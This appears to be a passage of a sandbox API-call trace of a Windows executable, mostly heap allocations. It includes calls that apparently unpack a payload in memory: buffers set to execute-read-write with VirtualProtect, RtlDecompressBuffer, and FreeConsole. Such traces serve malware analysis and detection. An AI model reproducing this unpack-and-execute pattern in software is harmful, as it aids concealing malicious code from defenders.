CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0f½ú¬\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0099.730] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x122f152) returned 0x0 [0099.731] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.731] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.732] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x572fa0 [0099.732] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x572fc0 [0099.732] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5711f8 [0099.732] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0x572fd0 [0099.732] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x572fd0 | out: hHeap=0x570000) returned 1 [0099.732] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0x572fd0 [0099.732] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.732] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x571220 [0099.733] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x571230 [0099.733] GetLastError () returned 0x0 [0099.733] SetLastError (dwErrCode=0x0) [0099.733] GetLastError () returned 0x0 [0099.733] SetLastError (dwErrCode=0x0) [0099.733] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd8) returned 0x571250 [0099.733] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x355) returned 0x571330 [0099.734] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571330 | out: hHeap=0x570000) returned 1 [0099.734] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0x571330 [0099.734] GetLastError () returned 0x0 [0099.734] SetLastError (dwErrCode=0x0) [0099.734] GetLastError () returned 0x0 [0099.734] SetLastError (dwErrCode=0x0) [0099.734] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd8) returned 0x571340 [0099.735] GetLastError () returned 0x0 [0099.735] SetLastError (dwErrCode=0x0) [0099.735] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x355) returned 0x571420 [0099.735] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571420 | out: hHeap=0x570000) returned 1 [0099.736] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571250 | out: hHeap=0x570000) returned 1 [0099.736] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2) returned 0x571250 [0099.736] GetLastError () returned 0x0 [0099.736] SetLastError (dwErrCode=0x0) [0099.736] GetLastError () returned 0x0 [0099.736] SetLastError (dwErrCode=0x0) [0099.736] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x200) returned 0x571420 [0099.736] GetLastError () returned 0x0 [0099.736] SetLastError (dwErrCode=0x0) [0099.736] GetLastError () returned 0x0 [0099.736] SetLastError (dwErrCode=0x0) [0099.736] GetLastError () returned 0x0 [0099.737] SetLastError (dwErrCode=0x0) [0099.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd8) returned 0x571628 [0099.737] GetLastError () returned 0x0 [0099.737] SetLastError (dwErrCode=0x0) [0099.737] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x355) returned 0x572fe8 [0099.738] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x572fe8 | out: hHeap=0x570000) returned 1 [0099.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571340 | out: hHeap=0x570000) returned 1 [0099.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571250 | out: hHeap=0x570000) returned 1 [0099.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571330 | out: hHeap=0x570000) returned 1 [0099.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x571250 [0099.838] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.839] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.839] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.839] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.840] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.840] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.840] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.841] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.841] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x572710) returned 0x80 [0099.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x571260 [0099.841] LoadLibraryW (lpLibFileName="msimg32.dll") returned 0x6d3c0000 [0100.143] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x571260 [0100.143] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571260 [0100.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x5712a8 [0100.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x5712f0 [0100.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x571348 [0100.143] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5713a0 [0100.144] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5713a0 | out: hHeap=0x570000) returned 1 [0100.144] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0100.144] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712f0 | out: hHeap=0x570000) returned 1 [0100.144] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712a8 | out: hHeap=0x570000) returned 1 [0100.144] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.144] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571260 [0100.144] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x5712a8 [0100.145] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712a8 | out: hHeap=0x570000) returned 1 [0100.145] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtect") returned 0x74597a50 [0100.145] VirtualProtect (in: lpAddress=0x1239b40, dwSize=0xe37ef, flNewProtect=0x40, lpflOldProtect=0x19fbec | out: lpflOldProtect=0x19fbec*=0x20) returned 1 [0100.156] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.156] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x571260 [0100.156] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x571298 [0100.156] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5712f0 [0100.265] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712f0 | out: hHeap=0x570000) returned 1 [0100.265] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571298 | out: hHeap=0x570000) returned 1 [0100.265] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.266] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x571260 [0100.266] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5712b8 [0100.266] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x5712e0 [0100.266] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x571318 [0100.266] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571370 [0100.266] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x5713b8 [0100.290] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x571708 [0100.298] FreeConsole () returned 1 [0100.299] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571708 | out: hHeap=0x570000) returned 1 [0100.299] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5713b8 | out: hHeap=0x570000) returned 1 [0100.300] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571370 | out: hHeap=0x570000) returned 1 [0100.300] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571318 | out: hHeap=0x570000) returned 1 [0100.300] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712e0 | out: hHeap=0x570000) returned 1 [0100.301] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712b8 | out: hHeap=0x570000) returned 1 [0100.301] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.301] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571260 [0100.302] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.302] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571260 [0100.302] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x5712a8 [0100.429] GetProcAddress (hModule=0x77830000, lpProcName="RtlDecompressBuffer") returned 0x778a6b80 [0100.429] RtlDecompressBuffer (in: CompressionFormat=0x102, UncompressedBuffer=0xaf9020, UncompressedBufferSize=0x2aa7cd, CompressedBuffer=0x1239b40, CompressedBufferSize=0xe37ef, FinalUncompressedSize=0x19fbb4 | out: UncompressedBuffer=0xaf9020, FinalUncompressedSize=0x19fbb4) returned 0x0 [0100.545] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712a8 | out: hHeap=0x570000) returned 1 [0100.546] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.546] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571260 [0100.546] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x5712a8 [0100.546] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712a8 | out: hHeap=0x570000) returned 1 [0100.547] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.547] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x571260 [0100.547] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x571288 [0100.547] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x5712c0 [0100.547] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x5712e8 [0100.567] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x571340 [0100.567] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x571350 [0100.567] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571340 | out: hHeap=0x570000) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x571368 [0100.568] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571350 | out: hHeap=0x570000) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x571340 [0100.568] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571368 | out: hHeap=0x570000) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x571368 [0100.568] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571340 | out: hHeap=0x570000) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x48) returned 0x5713a0 [0100.569] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571368 | out: hHeap=0x570000) returned 1 [0100.569] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x68) returned 0x571708 [0100.569] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5713a0 | out: hHeap=0x570000) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x98) returned 0x571340 [0100.570] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571708 | out: hHeap=0x570000) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe0) returned 0x571708 [0100.570] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571340 | out: hHeap=0x570000) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x150) returned 0x5717f0 [0100.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571708 | out: hHeap=0x570000) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1f8) returned 0x572fe8 [0100.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5717f0 | out: hHeap=0x570000) returned 1 [0100.586] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x70) returned 0x571340 [0100.586] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571340 | out: hHeap=0x570000) returned 1 [0100.587] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x572fe8 | out: hHeap=0x570000) returned 1 [0100.587] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712e8 | out: hHeap=0x570000) returned 1 [0100.587] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712c0 | out: hHeap=0x570000) returned 1 [0100.588] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571288 | out: hHeap=0x570000) returned 1 [0100.588] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.588] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571260 [0100.588] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x5712a8 [0100.588] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712a8 | out: hHeap=0x570000) returned 1 [0100.589] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.596] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x571260 [0100.744] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.771] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x571260 [0100.771] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x571288 [0100.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x5712b0 [0100.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x5712e8 [0100.772] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571340 [0100.778] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571340 | out: hHeap=0x570000) returned 1 [0100.779] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712e8 | out: hHeap=0x570000) returned 1 [0100.780] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712b0 | out: hHeap=0x570000) returned 1 [0100.781] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571288 | out: hHeap=0x570000) returned 1 [0100.781] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0100.781] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x571260 [0100.782] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x5712a8 [0100.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x50) returned 0x5712f0 [0100.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x571348 [0100.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x571358 [0100.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x571368 [0100.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571358 | out: hHeap=0x570000) returned 1 [0100.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x571348 [0100.788] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571368 | out: hHeap=0x570000) returned 1 [0100.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x571368 [0100.789] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0100.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x24) returned 0x571388 [0100.789] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571368 | out: hHeap=0x570000) returned 1 [0100.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x34) returned 0x571348 [0100.789] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571388 | out: hHeap=0x570000) returned 1 [0100.790] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4c) returned 0x571388 [0100.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0100.790] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x70) returned 0x571708 [0100.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571388 | out: hHeap=0x570000) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa8) returned 0x571348 [0100.791] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571708 | out: hHeap=0x570000) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfc) returned 0x571708 [0100.791] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0100.791] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x178) returned 0x571810 [0100.792] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571708 | out: hHeap=0x570000) returned 1 [0100.792] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x234) returned 0x572fe8 [0100.792] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571810 | out: hHeap=0x570000) returned 1 [0100.792] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x34c) returned 0x573228 [0100.793] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x572fe8 | out: hHeap=0x570000) returned 1 [0100.793] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4f0) returned 0x573580 [0100.793] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573228 | out: hHeap=0x570000) returned 1 [0100.793] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x768) returned 0x573a78 [0100.794] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573580 | out: hHeap=0x570000) returned 1 [0100.794] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xb1c) returned 0x5741e8 [0100.794] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573a78 | out: hHeap=0x570000) returned 1 [0100.795] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10a8) returned 0x572fe8 [0100.795] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5741e8 | out: hHeap=0x570000) returned 1 [0100.795] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18fc) returned 0x574098 [0100.796] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x572fe8 | out: hHeap=0x570000) returned 1 [0101.100] GetProcAddress (hModule=0x74580000, lpProcName="VirtualFree") returned 0x74597600 [0101.100] VirtualFree (lpAddress=0xaf9020, dwSize=0x0, dwFreeType=0x8000) returned 0 [0101.122] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x571348 [0101.129] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x571358 [0101.135] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0101.135] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc) returned 0x571368 [0101.135] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571358 | out: hHeap=0x570000) returned 1 [0101.135] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x571348 [0101.135] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571368 | out: hHeap=0x570000) returned 1 [0101.148] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x571368 [0101.148] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0101.148] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x24) returned 0x571388 [0101.148] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571368 | out: hHeap=0x570000) returned 1 [0101.148] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x34) returned 0x571348 [0101.149] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571388 | out: hHeap=0x570000) returned 1 [0101.150] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4c) returned 0x571388 [0101.150] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0101.150] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x70) returned 0x571708 [0101.150] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571388 | out: hHeap=0x570000) returned 1 [0101.151] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa8) returned 0x571348 [0101.151] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571708 | out: hHeap=0x570000) returned 1 [0101.151] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfc) returned 0x571708 [0101.151] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571348 | out: hHeap=0x570000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x178) returned 0x571810 [0101.152] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571708 | out: hHeap=0x570000) returned 1 [0101.152] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x234) returned 0x572fe8 [0101.153] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571810 | out: hHeap=0x570000) returned 1 [0101.154] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x34c) returned 0x573228 [0101.154] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x572fe8 | out: hHeap=0x570000) returned 1 [0101.160] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2a28) returned 0x5759a0 [0101.161] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574098 | out: hHeap=0x570000) returned 1 [0101.162] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573228 | out: hHeap=0x570000) returned 1 [0101.162] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5759a0 | out: hHeap=0x570000) returned 1 [0101.163] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712f0 | out: hHeap=0x570000) returned 1 [0101.163] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5712a8 | out: hHeap=0x570000) returned 1 [0101.163] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x571260 | out: hHeap=0x570000) returned 1 [0101.164] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtect") returned 0x74597a50 [0101.164] VirtualProtect (in: lpAddress=0xdb5020, dwSize=0x1354bd, flNewProtect=0x40, lpflOldProtect=0x19fc24 | out: lpflOldProtect=0x19fc24*=0x4) returned 1 [0101.195] RtlAllocateHeap 